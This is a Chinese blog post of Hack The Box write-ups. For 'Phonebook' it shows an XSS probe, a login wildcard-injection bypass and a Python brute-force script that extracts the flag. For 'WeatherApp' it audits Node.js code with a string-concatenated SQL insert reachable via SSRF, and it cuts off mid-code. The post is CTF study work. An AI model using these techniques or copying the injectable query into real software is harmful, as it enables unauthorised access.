

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/icon.png">
  <link rel="icon" href="/img/icon.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Potat0w0">
  <meta name="keywords" content="">
  
    <meta name="description" content="Hack The Box做题记录Phonebook 一个登录界面，下面提示用Reese登录，看到登录框试着SQL注入，但是发现不管什么姿势都没用，再观察，发现输入错误时会请求一个GET参数message，  可能这里也有漏洞，尝试了下xss，&lt;img src&#x3D;x onerror&#x3D;alert(1)&gt;  确实存在xss漏洞，但是经观察，并不能对其利用，那试试模板注入： 这里不止试了这一种，">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB_note">
<meta property="og:url" content="http://example.com/2023/08/03/HTB-note/index.html">
<meta property="og:site_name" content="Potat0w0">
<meta property="og:description" content="Hack The Box做题记录Phonebook 一个登录界面，下面提示用Reese登录，看到登录框试着SQL注入，但是发现不管什么姿势都没用，再观察，发现输入错误时会请求一个GET参数message，  可能这里也有漏洞，尝试了下xss，&lt;img src&#x3D;x onerror&#x3D;alert(1)&gt;  确实存在xss漏洞，但是经观察，并不能对其利用，那试试模板注入： 这里不止试了这一种，">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/img/cover/6.jpg">
<meta property="article:published_time" content="2023-08-03T09:49:46.000Z">
<meta property="article:modified_time" content="2023-10-10T05:36:22.776Z">
<meta property="article:author" content="Potat0w0">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="正则表达式">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/cover/6.jpg">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>HTB_note - Potat0w0</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":50,"cursorChar":"💕","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Potat0w0&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                <span>Links</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="HTB_note"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        Potat0w0
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-08-03 17:49" pubdate>
          August 3, 2023 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          12k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          97 mins
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> views
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">HTB_note</h1>
            
              <p class="note note-info">
                
                  
                    Last updated on a month ago
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="Hack-The-Box做题记录"><a href="#Hack-The-Box做题记录" class="headerlink" title="Hack The Box做题记录"></a>Hack The Box做题记录</h1><h3 id="Phonebook"><a href="#Phonebook" class="headerlink" title="Phonebook"></a>Phonebook</h3><p><img src="/2023/08/03/HTB-note/image-20230803180922022.png" srcset="/img/loading.gif" lazyload></p>
<p>一个登录界面，下面提示用Reese登录，看到登录框试着SQL注入，但是发现不管什么姿势都没用，再观察，发现输入错误时会请求一个GET参数message，</p>
<p><img src="/2023/08/03/HTB-note/image-20230803182452389.png" srcset="/img/loading.gif" lazyload></p>
<p>可能这里也有漏洞，尝试了下xss，<code>&lt;img src=x onerror=alert(1)&gt;</code></p>
<p><img src="/2023/08/03/HTB-note/image-20230803182633427.png" srcset="/img/loading.gif" lazyload></p>
<p>确实存在xss漏洞，但是经观察，并不能对其利用，那试试模板注入：</p>
<p>这里不止试了这一种，用tplmap跑了一遍所有的模板引擎的情况，都不行，大概模板注入也是走不通了</p>
<p><img src="/2023/08/03/HTB-note/image-20230803182757988.png" srcset="/img/loading.gif" lazyload></p>
<p>去找hint吧。。看了别人到这的做法，是在密码传入通配符’*’？？未曾设想的道路。</p>
<p>然后跳转到这样一个页面，在搜索框里随便输入一个1，显示出挺多的，</p>
<p><img src="/2023/08/03/HTB-note/image-20230803184308396.png" srcset="/img/loading.gif" lazyload></p>
<p>在搜索框也是一顿暴锤，按刚刚的姿势把<code>*</code>输入返回无搜索结果，然后发现<code>*</code>后面随便输一个字符发现居然蹦出好多，</p>
<p><img src="/image-20230803185410362.png" srcset="/img/loading.gif" lazyload alt="image-20230803185410362"></p>
<p>那。。推测不就是正则表达式了吗？理解了题意之后去&#x2F;login页面，传入：</p>
<p><img src="/2023/08/03/HTB-note/image-20230803205625894.png" srcset="/img/loading.gif" lazyload></p>
<p>发生了跳转，*代表匹配前面的字符任意次(<strong>零次</strong>或多次)，如<code>ab*</code>表示匹配a后面跟着任意个连续的b，可匹配a,ab,abb等，<code>a*b</code>可匹配任意个连续的a开头，后面跟一个b，可匹配b,ab,aab等，<code>a*b*c</code>匹配任意个连续的a开头，后跟任意个连续的b，最后以一个c结尾，如c,ac,bc,abc,aabc,abbc,aaabbc等</p>
<p><code>&#39;.&#39;</code>(点号)：匹配任意单个字符，除换行符。eg：<code>a.b</code>可匹配aab,axb,a@b等</p>
<p><code>.*</code>就形成了贪婪匹配，匹配以a开头，后跟任意个字符，最后以b结尾，如axyzb，a@qqb等</p>
<p><code>&#39;?&#39;</code>(问号)：表示匹配前面的字符0次或1次，如ab?可匹配ab或a</p>
<p><code>+</code>(加号)：表示匹配前面的字符<strong>一次</strong>或多次</p>
<p><code>&#123;n&#125;</code>：表示匹配前面的字符恰好n次，如a{3}表示匹配恰好三个连续的a字符</p>
<p><code>&#123;n,&#125;</code>：表示匹配前面的字符至少n次，如，a{2,}可匹配aabcd,aaabcd等</p>
<p><code>&#123;n,m&#125;</code>：表示匹配前面的字符至少n次，最多m次</p>
<p><code>[]</code>：表示字符类，匹配其中的任意一个字符，如[abc]可匹配a,b或c</p>
<p><code>[^]</code>：表示否定字符类，匹配除了其中字符外的任意字符</p>
<p>这里我们根据*匹配前面的字符任意次，我们编写脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>pre = <span class="hljs-string">&#x27;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_&#125;&#123;?!@#$%^&amp;*&lt;&gt;&#x27;</span><br><br>url = <span class="hljs-string">&#x27;http://167.172.61.89:32269/login&#x27;</span><br><br>flag = <span class="hljs-string">&#x27;&#x27;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-number">60</span>):<br>    <span class="hljs-keyword">for</span> char <span class="hljs-keyword">in</span> pre:<br>        <span class="hljs-built_in">print</span>(char)<br>        payload = flag + char + <span class="hljs-string">&#x27;*&#x27;</span><br><span class="hljs-comment">#逐步判断H*,HT*,HTB*,HTB&#123;*等等</span><br>        r = requests.post(url,data=&#123;<br>                <span class="hljs-string">&#x27;username&#x27;</span>:<span class="hljs-string">&#x27;Reese&#x27;</span>,<br>                <span class="hljs-string">&#x27;password&#x27;</span>:payload<br>        &#125;).text<br>        <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;success&#x27;</span> <span class="hljs-keyword">in</span> r:<br>            flag += char<br>            <span class="hljs-built_in">print</span>(flag)<br>            <span class="hljs-keyword">break</span><br></code></pre></td></tr></table></figure>

<p><img src="/2023/08/03/HTB-note/image-20230803233340896.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="WeatherApp"><a href="#WeatherApp" class="headerlink" title="WeatherApp"></a>WeatherApp</h3><p>打开之后是这样一个页面：</p>
<p><img src="/2023/08/03/HTB-note/image-20230812185016968.png" srcset="/img/loading.gif" lazyload></p>
<p>审计源代码：<br>.&#x2F;index.js：</p>
<p><img src="/2023/08/03/HTB-note/image-20230812185353082.png" srcset="/img/loading.gif" lazyload></p>
<p>.&#x2F;routes&#x2F;index.js：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">const</span> path              = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;path&#x27;</span>);<br><span class="hljs-keyword">const</span> fs                = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;fs&#x27;</span>);<br><span class="hljs-keyword">const</span> express           = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;express&#x27;</span>);<br><span class="hljs-keyword">const</span> router            = express.<span class="hljs-title class_">Router</span>();<br><span class="hljs-keyword">const</span> <span class="hljs-title class_">WeatherHelper</span>     = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;../helpers/WeatherHelper&#x27;</span>);<br><br><span class="hljs-keyword">let</span> db;<br><br><span class="hljs-keyword">const</span> <span class="hljs-title function_">response</span> = data =&gt; (&#123; <span class="hljs-attr">message</span>: data &#125;);<br><br>router.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> &#123;<br>	<span class="hljs-keyword">return</span> res.<span class="hljs-title function_">sendFile</span>(path.<span class="hljs-title function_">resolve</span>(<span class="hljs-string">&#x27;views/index.html&#x27;</span>));<br>&#125;);<br><br>router.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/register&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> &#123;<br>	<span class="hljs-keyword">return</span> res.<span class="hljs-title function_">sendFile</span>(path.<span class="hljs-title function_">resolve</span>(<span class="hljs-string">&#x27;views/register.html&#x27;</span>));<br>&#125;);<br><br>router.<span class="hljs-title function_">post</span>(<span class="hljs-string">&#x27;/register&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> &#123;<br><br>	<span class="hljs-keyword">if</span> (req.<span class="hljs-property">socket</span>.<span class="hljs-property">remoteAddress</span>.<span class="hljs-title function_">replace</span>(<span class="hljs-regexp">/^.*:/</span>, <span class="hljs-string">&#x27;&#x27;</span>) != <span class="hljs-string">&#x27;127.0.0.1&#x27;</span>) &#123;<br>		<span class="hljs-keyword">return</span> res.<span class="hljs-title function_">status</span>(<span class="hljs-number">401</span>).<span class="hljs-title function_">end</span>();<br>	&#125;<br><br>	<span class="hljs-keyword">let</span> &#123; username, password &#125; = req.<span class="hljs-property">body</span>;<br><br>	<span class="hljs-keyword">if</span> (username &amp;&amp; password) &#123;<br>		<span class="hljs-keyword">return</span> db.<span class="hljs-title function_">register</span>(username, password)<br>			.<span class="hljs-title function_">then</span>(<span class="hljs-function">()  =&gt;</span> res.<span class="hljs-title function_">send</span>(<span class="hljs-title function_">response</span>(<span class="hljs-string">&#x27;Successfully registered&#x27;</span>)))<br>			.<span class="hljs-title function_">catch</span>(<span class="hljs-function">() =&gt;</span> res.<span class="hljs-title function_">send</span>(<span class="hljs-title function_">response</span>(<span class="hljs-string">&#x27;Something went wrong&#x27;</span>)));<br>	&#125;<br><br>	<span class="hljs-keyword">return</span> res.<span class="hljs-title function_">send</span>(<span class="hljs-title function_">response</span>(<span class="hljs-string">&#x27;Missing parameters&#x27;</span>));<br>&#125;);<br><br>router.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/login&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> &#123;<br>	<span class="hljs-keyword">return</span> res.<span class="hljs-title function_">sendFile</span>(path.<span class="hljs-title function_">resolve</span>(<span class="hljs-string">&#x27;views/login.html&#x27;</span>));<br>&#125;);<br><br>router.<span class="hljs-title function_">post</span>(<span class="hljs-string">&#x27;/login&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> &#123;<br>	<span class="hljs-keyword">let</span> &#123; username, password &#125; = req.<span class="hljs-property">body</span>;<br><br>	<span class="hljs-keyword">if</span> (username &amp;&amp; password) &#123;<br>		<span class="hljs-keyword">return</span> db.<span class="hljs-title function_">isAdmin</span>(username, password)<br>			.<span class="hljs-title function_">then</span>(<span class="hljs-function"><span class="hljs-params">admin</span> =&gt;</span> &#123;<br>				<span class="hljs-keyword">if</span> (admin) <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">send</span>(fs.<span class="hljs-title function_">readFileSync</span>(<span class="hljs-string">&#x27;/app/flag&#x27;</span>).<span class="hljs-title function_">toString</span>());<br>				<span class="hljs-keyword">return</span> res.<span class="hljs-title function_">send</span>(<span class="hljs-title function_">response</span>(<span class="hljs-string">&#x27;You are not admin&#x27;</span>));<br>			&#125;)<br>			.<span class="hljs-title function_">catch</span>(<span class="hljs-function">() =&gt;</span> res.<span class="hljs-title function_">send</span>(<span class="hljs-title function_">response</span>(<span class="hljs-string">&#x27;Something went wrong&#x27;</span>)));<br>	&#125;<br>	<br>	<span class="hljs-keyword">return</span> re.<span class="hljs-title function_">send</span>(<span class="hljs-title function_">response</span>(<span class="hljs-string">&#x27;Missing parameters&#x27;</span>));<br>&#125;);<br><br>router.<span class="hljs-title function_">post</span>(<span class="hljs-string">&#x27;/api/weather&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> &#123;<br>	<span class="hljs-keyword">let</span> &#123; endpoint, city, country &#125; = req.<span class="hljs-property">body</span>;<br><br>	<span class="hljs-keyword">if</span> (endpoint &amp;&amp; city &amp;&amp; country) &#123;<br>		<span class="hljs-keyword">return</span> <span class="hljs-title class_">WeatherHelper</span>.<span class="hljs-title function_">getWeather</span>(res, endpoint, city, country);<br>	&#125;<br><br>	<span class="hljs-keyword">return</span> res.<span class="hljs-title function_">send</span>(<span class="hljs-title function_">response</span>(<span class="hljs-string">&#x27;Missing parameters&#x27;</span>));<br>&#125;);	<br><br><span class="hljs-variable language_">module</span>.<span class="hljs-property">exports</span> = <span class="hljs-function"><span class="hljs-params">database</span> =&gt;</span> &#123; <br>	db = database;<br>	<span class="hljs-keyword">return</span> router;<br>&#125;;<br></code></pre></td></tr></table></figure>

<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs js">router.<span class="hljs-title function_">post</span>(<span class="hljs-string">&#x27;/register&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> &#123;<br><br>	<span class="hljs-keyword">if</span> (req.<span class="hljs-property">socket</span>.<span class="hljs-property">remoteAddress</span>.<span class="hljs-title function_">replace</span>(<span class="hljs-regexp">/^.*:/</span>, <span class="hljs-string">&#x27;&#x27;</span>) != <span class="hljs-string">&#x27;127.0.0.1&#x27;</span>) &#123;<br>		<span class="hljs-keyword">return</span> res.<span class="hljs-title function_">status</span>(<span class="hljs-number">401</span>).<span class="hljs-title function_">end</span>();<br>	&#125;<br><br>	<span class="hljs-keyword">let</span> &#123; username, password &#125; = req.<span class="hljs-property">body</span>;<br><br>	<span class="hljs-keyword">if</span> (username &amp;&amp; password) &#123;<br>		<span class="hljs-keyword">return</span> db.<span class="hljs-title function_">register</span>(username, password)<br>			.<span class="hljs-title function_">then</span>(<span class="hljs-function">()  =&gt;</span> res.<span class="hljs-title function_">send</span>(<span class="hljs-title function_">response</span>(<span class="hljs-string">&#x27;Successfully registered&#x27;</span>)))<br>			.<span class="hljs-title function_">catch</span>(<span class="hljs-function">() =&gt;</span> res.<span class="hljs-title function_">send</span>(<span class="hljs-title function_">response</span>(<span class="hljs-string">&#x27;Something went wrong&#x27;</span>)));<br>	&#125;<br><br>	<span class="hljs-keyword">return</span> res.<span class="hljs-title function_">send</span>(<span class="hljs-title function_">response</span>(<span class="hljs-string">&#x27;Missing parameters&#x27;</span>));<br>&#125;);<br></code></pre></td></tr></table></figure>

<p>从上面我们可以看到&#x2F;register路由的配置，在访问&#x2F;register时需要用户的远程IP为本地回环地址，否则就会返回401状态码，也就是说只有内网才能访问，就很容易想到SSRF利用存在可能性，有看到一个register()方法，追踪去看这个函数，在database.js中，这里<code>register()</code>没有用使用预编译SQL语句，而是直接拼接字符串，存在SQL注入利用的可能性：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">async</span> <span class="hljs-title function_">register</span>(<span class="hljs-params">user, pass</span>) &#123;<br>    <span class="hljs-comment">// <span class="hljs-doctag">TODO:</span> add parameterization and roll public</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Promise</span>(<span class="hljs-keyword">async</span> (resolve, reject) =&gt; &#123;<br>        <span class="hljs-keyword">try</span> &#123;<br>            <span class="hljs-keyword">let</span> query = <span class="hljs-string">`INSERT INTO users (username, password) VALUES (&#x27;<span class="hljs-subst">$&#123;user&#125;</span>&#x27;, &#x27;<span class="hljs-subst">$&#123;pass&#125;</span>&#x27;)`</span>;<br>            <span class="hljs-title function_">resolve</span>((<span class="hljs-keyword">await</span> <span class="hljs-variable language_">this</span>.<span class="hljs-property">db</span>.<span class="hljs-title function_">run</span>(query)));<br>        &#125; <span class="hljs-keyword">catch</span>(e) &#123;<br>            <span class="hljs-title function_">reject</span>(e);<br>        &#125;<br>    &#125;);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>然后是&#x2F;login路由，这里就能看到&#x2F;flag的获取渠道了，需要经过<code>isAdmin()</code>方法的验证以admin身份登录。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs js">router.<span class="hljs-title function_">post</span>(<span class="hljs-string">&#x27;/login&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> &#123;<br>	<span class="hljs-keyword">let</span> &#123; username, password &#125; = req.<span class="hljs-property">body</span>;<br><br>	<span class="hljs-keyword">if</span> (username &amp;&amp; password) &#123;<br>		<span class="hljs-keyword">return</span> db.<span class="hljs-title function_">isAdmin</span>(username, password)<br>			.<span class="hljs-title function_">then</span>(<span class="hljs-function"><span class="hljs-params">admin</span> =&gt;</span> &#123;<br>				<span class="hljs-keyword">if</span> (admin) <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">send</span>(fs.<span class="hljs-title function_">readFileSync</span>(<span class="hljs-string">&#x27;/app/flag&#x27;</span>).<span class="hljs-title function_">toString</span>());<br>				<span class="hljs-keyword">return</span> res.<span class="hljs-title function_">send</span>(<span class="hljs-title function_">response</span>(<span class="hljs-string">&#x27;You are not admin&#x27;</span>));<br>			&#125;)<br>			.<span class="hljs-title function_">catch</span>(<span class="hljs-function">() =&gt;</span> res.<span class="hljs-title function_">send</span>(<span class="hljs-title function_">response</span>(<span class="hljs-string">&#x27;Something went wrong&#x27;</span>)));<br>	&#125;<br>	<br>	<span class="hljs-keyword">return</span> re.<span class="hljs-title function_">send</span>(<span class="hljs-title function_">response</span>(<span class="hljs-string">&#x27;Missing parameters&#x27;</span>));<br>&#125;);<br></code></pre></td></tr></table></figure>

<p>顺着去找<code>isAdmin()</code>方法，在database.js中，这里查询用的预编译：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">async</span> <span class="hljs-title function_">isAdmin</span>(<span class="hljs-params">user, pass</span>) &#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Promise</span>(<span class="hljs-keyword">async</span> (resolve, reject) =&gt; &#123;<br>        <span class="hljs-keyword">try</span> &#123;<br>            <span class="hljs-keyword">let</span> smt = <span class="hljs-keyword">await</span> <span class="hljs-variable language_">this</span>.<span class="hljs-property">db</span>.<span class="hljs-title function_">prepare</span>(<span class="hljs-string">&#x27;SELECT username FROM users WHERE username = ? and password = ?&#x27;</span>);<br>            <span class="hljs-keyword">let</span> row = <span class="hljs-keyword">await</span> smt.<span class="hljs-title function_">get</span>(user, pass);<br>            <span class="hljs-title function_">resolve</span>(row !== <span class="hljs-literal">undefined</span> ? row.<span class="hljs-property">username</span> == <span class="hljs-string">&#x27;admin&#x27;</span> : <span class="hljs-literal">false</span>);<br>        &#125; <span class="hljs-keyword">catch</span>(e) &#123;<br>            <span class="hljs-title function_">reject</span>(e);<br>        &#125;<br>    &#125;);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>database.js这里<code>migrate()</code>函数中在创建admin用户时生成了个32位的随机数然后再转16进制再经过加密，爆破是几乎不可能的了</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">async</span> <span class="hljs-title function_">migrate</span>(<span class="hljs-params"></span>) &#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable language_">this</span>.<span class="hljs-property">db</span>.<span class="hljs-title function_">exec</span>(<span class="hljs-string">`</span><br><span class="hljs-string">        DROP TABLE IF EXISTS users;</span><br><span class="hljs-string"></span><br><span class="hljs-string">        CREATE TABLE IF NOT EXISTS users (</span><br><span class="hljs-string">            id         INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,</span><br><span class="hljs-string">            username   VARCHAR(255) NOT NULL UNIQUE,</span><br><span class="hljs-string">            password   VARCHAR(255) NOT NULL</span><br><span 